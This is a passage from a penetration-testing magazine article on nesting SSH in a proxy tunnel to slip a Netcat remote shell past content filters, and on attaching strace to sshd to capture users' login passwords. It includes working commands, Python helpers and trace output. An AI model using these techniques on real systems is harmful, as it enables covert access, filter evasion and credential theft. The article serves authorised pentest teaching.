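On the wire, what a tool like Proxytunnel does to get through the proxy is conceptually simple: it issues an HTTP CONNECT request and checks for a 2xx answer, after which the proxy blindly relays bytes between the two ends. A minimal sketch of that handshake in Python (the function names are ours and purely illustrative — this is not Proxytunnel’s actual code):

```python
def build_connect_request(dest_host, dest_port):
    """Build the HTTP CONNECT request a tunneling client sends to a proxy."""
    return (
        f"CONNECT {dest_host}:{dest_port} HTTP/1.1\r\n"
        f"Host: {dest_host}:{dest_port}\r\n"
        "Proxy-Connection: keep-alive\r\n"
        "\r\n"
    ).encode()

def tunnel_established(response):
    """Return True if the proxy's status line grants the tunnel (2xx)."""
    status_line = response.split(b"\r\n", 1)[0].decode(errors="replace")
    parts = status_line.split()
    return len(parts) >= 2 and parts[1].startswith("2")
```

Once `tunnel_established` is true, everything written to the socket — in our case the SSH handshake toward port 443 — is forwarded untouched, which is what lets the encrypted tunnel ride through the proxy.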
The last line of Listing 5 shows the connection that has been established from our workstation to the compromised host (Listing 6). Again, notice that from the compromised machine’s point of view the connection comes from localhost; this is because the endpoint of the SSH tunnel is on the victim’s localhost (port 6666). Let’s try to better understand what is happening and how we finally gained the remote shell on the victim’s machine. Listing 7 shows the result of the netstat command on the compromised host. The first netstat line is the connection from the compromised machine to the proxy that establishes the first tunnel (the proxy tunnel), opening local port 1025, which forwards to our workstation on port 443, where our SSH daemon is listening. The second and third netstat lines are the SSH tunnel encapsulated into the proxy tunnel (connected to localhost on port 1025); it can get out of the victim’s network and reach our SSH daemon on port 443 because it is nested inside the proxy tunnel, which makes it appear to the content filter as normal SSL-over-HTTP (read: HTTPS) traffic. After being allowed to traverse the
Figure 3. Connections established in order to elude content inspection filters

Listing 7. The netstat command result on the compromised machine

Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address            Foreign Address          State
tcp        0      0 172.23.69.101:57808      172.23.69.102:8080       ESTABLISHED
tcp        0      0 127.0.0.1:58039          127.0.0.1:1025           ESTABLISHED
tcp        0      0 127.0.0.1:1025           127.0.0.1:58039          ESTABLISHED
tcp        0      0 127.0.0.1:57676          127.0.0.1:6666           ESTABLISHED
tcp        0      0 127.0.0.1:6666           127.0.0.1:57676          ESTABLISHED
content filter, it reaches our machine, establishing a second tunnel over the first. The fourth and fifth netstat lines are the connection from our workstation (encapsulated in both the SSH and proxy tunnels) that reaches the compromised machine on port 6666, where Netcat is listening, giving us the remote shell. A question naturally arises: why implement the SSH tunnel at all? Couldn’t we connect directly to the remote shell over the proxy tunnel, avoiding the overhead and complexity of the double encapsulation model we have used? The answer, as you can probably imagine, is no. Or rather: since we assume we are working against an effective content inspection device, we suppose that without cryptography the proxy would be able to decapsulate the nested data stream, detect the protocol (in this case Netcat, but it could have been MySQL, Remote Desktop, etc.) and,
A note on names and definitions
Please note that, in reality, least privilege and privilege separation are two different hardening techniques. The “On the web” paragraph provides a web reference which clearly explains the difference. In this article, we discuss least privilege as it is applied through privilege separation.
depending on the policy, drop the connection. Encrypting the data stream prevented the inspection device from understanding which protocol we were using; in fact, we misled the device into thinking we made a common HTTPS connection. Note that the same strategy can also be used to elude network-level anti-virus or any other security device that silently analyzes the data stream. So, aren’t SSH tunnels cool? If you think so, let’s take a step forward by verifying whether the IT guy agrees with us. Let’s see if he uses SSH to administer his infrastructure or to secure unencrypted protocols. Then we will see if his system is as secure as he thinks.
Changing point of view: Testing SSH connections
Let’s suppose we gained a remote shell on a Linux box and are looking at the ps and netstat command output. We notice that SSH is used to secure otherwise unencrypted connectivity, both for users connecting to the ERP system and for system administration tasks. Let’s see how to take advantage of this knowledge.

Stealing credentials from SSH inter-process communication

The second version of SSH is certainly a very strong protocol. At the moment, there is no known technique to decrypt sniffed traffic, nor an effective way to perform man-in-the-middle attacks on it. Beyond the mere use of SSH, all SSH daemon implementations enforce additional security measures in order to harden the application-layer design. One of those hardening features is the principle of least privilege, applied through privilege separation.

Figure 4. Privilege separation in OpenSSH authentication process

Privilege separation

Privilege separation is a programming technique in which software is split into parts, each designed to run compartmentalized, using only the specific privileges it requires. This pattern allows the developer to contain and restrict the effects of programming errors, so that a bug in an unprivileged process doesn’t automatically result in a compromise of the entire system. In OpenSSH – as well as in other SSH daemon implementations – privilege separation is an option, turned on by default, that makes use of unprivileged processes to authenticate user logins. When a client contacts the main – and privileged – process listening on port 22, it forks an unprivileged child to handle the authentication process. The child process handles communication with the client and sends the user credentials to the privileged process to be verified. If the privileged process’ credential verification succeeds, the unprivileged process state is exported and the main process forks another process, granting it the privileges of the authenticated user. Figure 4 shows user authentication in OpenSSH, highlighting the separation of privileges of every subprocess spawned by the main process. During the whole authentication process, communication between privileged and unprivileged processes is achieved by pipes, so the processes substantially share a piece of memory where unencrypted communication occurs. It is exactly that piece of memory that we will steal credentials from during inter-process communication; and, if we
Listing 8. Attaching strace to the sshd process to steal authentication credentials

owned-server# ps auxww | grep sshd
root       267  0.0  0.4  49176  1132 ?  Ss  08:33  0:00 /usr/sbin/sshd
owned-server# strace -f -e “read” -p 267 2> strace.log
Listing 9. Portions of traced read events between processes

Process 267 attached - interrupt to quit
Process 396 attached
(…)
[pid 396] read(6, “\7\0\0\0\6guests”, 11) = 11
(…)
[pid 396] <... read resumed> “\v\0\0\0\rare-like-fish”, 18) = 18
(…)
Process 398 attached
Process 399 attached
(…)
[pid 398] read(10, “Linux owned-server 2.6.32-5-open”..., 16384) = 230
[pid 398] read(11, “# /etc/profile: system-wide .pro”..., 8192) = 823
[pid 399] <... read resumed> “1000\n”, 128) = 5
(…)
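Mining a long strace.log by hand is tedious, so the payload of each traced read() can be extracted programmatically. Below is a rough, illustrative Python helper (our own sketch, not a standard tool) that pulls the printable characters out of the quoted buffers — enough to surface credentials like those visible in the trace:

```python
import codecs
import re

# Matches the quoted buffer of an strace read() line, e.g.
#   [pid 396] read(6, "\7\0\0\0\6guests", 11) = 11
READ_LINE = re.compile(r'"(.*)", \d+\) = \d+\s*$')

def printable_payload(strace_line):
    """Return the printable characters of a traced read() buffer,
    or None if the line carries no buffer."""
    m = READ_LINE.search(strace_line)
    if m is None:
        return None
    # strace prints the buffer with C-style escapes; decode, then keep
    # only printable characters (drops wire-format length prefixes).
    decoded = codecs.decode(m.group(1), "unicode_escape")
    return "".join(ch for ch in decoded if ch.isprintable())
```

Run over the trace, this turns the two credential reads into the bare strings "guests" and "are-like-fish", while lines without a buffer are skipped.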
Listing 10. The authenticated sshd child gains the user’s privileges

$ ps u 398
USER     PID %CPU %MEM   VSZ  RSS TTY  STAT START  TIME COMMAND
guests   398  0.0  0.6 68512 1760 ?    S    13:21  0:00 sshd: guests@pts/1
On the web

• http://www.debian-administration.org/articles/530 – A brief article on SSH public key authentication with RSA
• http://allanfeid.com/content/creating-chroot-jail-ssh-access – Creating a Chroot Jail for SSH Access
• http://www.chiark.greenend.org.uk/~sgtatham/putty – The official PuTTY web page
• http://www.mcafee.com/uk/downloads/free-tools/fpipe.aspx – Fpipe port redirector web page
• http://proxytunnel.sourceforge.net/ – Proxytunnel’s official website
• http://proxytunnel.sourceforge.net/paper.php – An interesting paper on how proxies work and the way Proxytunnel permits any TCP connection to traverse them
• http://en.wikipedia.org/wiki/Principle_of_least_privilege – Wikipedia’s description of the principle of least privilege
• http://en.wikipedia.org/wiki/Privilege_separation – Wikipedia’s description of privilege separation
• http://www.cerias.purdue.edu/site/blog/post/confusion-of-separation-of-privilege-and-least-privilege – Explanation of the difference between privilege separation and least privilege
want, by following the SSH process’ system calls we can sniff the entire user session.

Trace processes and intercept communications

We will now imagine we have successfully exploited a vulnerability that gave us a remote shell with root privileges (or that we gained them through a successful privilege escalation). In order to help executives understand the gravity of the issue, we want very impressive test results: we want to capture the username-password pairs of all users that log in to the system during the day, including root. To trace inter-process communication and steal them, we will use strace. Having a look at its man page, we can read that strace “intercepts and records the system calls which are called by a process and the signals which are received by a process”. First of all, we have to install, or upload to the system, a working strace executable (it only depends on libc); after finding the SSH daemon’s process id, we execute strace as shown in Listing 8. In Listing 8, we attached strace to process id 267 (option -p 267) and to its children (option -f). Since the information passes through a pipe, we don’t need it doubled (write and read events), so we ask strace to trace only read events (option -e “read”), and we redirect the output (strace writes to standard error) to a file (2> strace.log). To stop tracing, press Control+C. At first glance, the syntax of the generated file may seem quite confusing; after a careful read of the man page and a little experience, you will find it much clearer. Listing 9 shows some of the captured communication occurring between process 267, its unprivileged child 396, and the authenticated process 398. Let’s analyze the generated file. As we can see, different processes are attached to strace. In our example, process 396 handles authentication and
we can see that it reads the credentials (username: guests, password: are-like-fish). After successful authentication, a new child (process 398) is forked by the main sshd process and is granted the authenticated user’s privileges, as we can see in Listing 10. In Listing 9, we can also see that another process (399) is delegated by the main process to determine user guests’ user id (uid=1000) immediately after the user gets his terminal. An interesting feature of this tracing activity is that we can intercept and “sniff” the whole user pseudo-terminal (PTY) activity, including both input and output. This allows us to steal local passwords (such as those typed into the su command and logins on remote machines) and also to simply view sensitive data in the user’s virtual terminal. In addition, if the SSH session is used to establish an SSH tunnel, we will be able to sniff all of the encapsulated connections as though they were unencrypted. But let’s get back to work – we wanted the root password, right? Well, it should be quite simple! Let’s stop a couple of services and wait just a few minutes...
Andrea Zwirner
Andrea Zwirner is an Italian IT security consultant. He is the founder of Linkspirit, an Italian company that deals with ethical hacking, security auditing and advising. He strongly believes in Open Source and of late has collaborated with ISECOM and contributes to the Hacker Highschool project.
In the Upcoming Issue of PenTest Open...
SQL Injection, PCI DSS, BYOD Security and more... Available to download on February 25th
In order to reach the PenTest Magazine editorial team, please send your inquiry to en@pentestmag.com. We will reply a.s.a.p. PenTest Magazine reserves the right to change the content of the next Magazine Edition.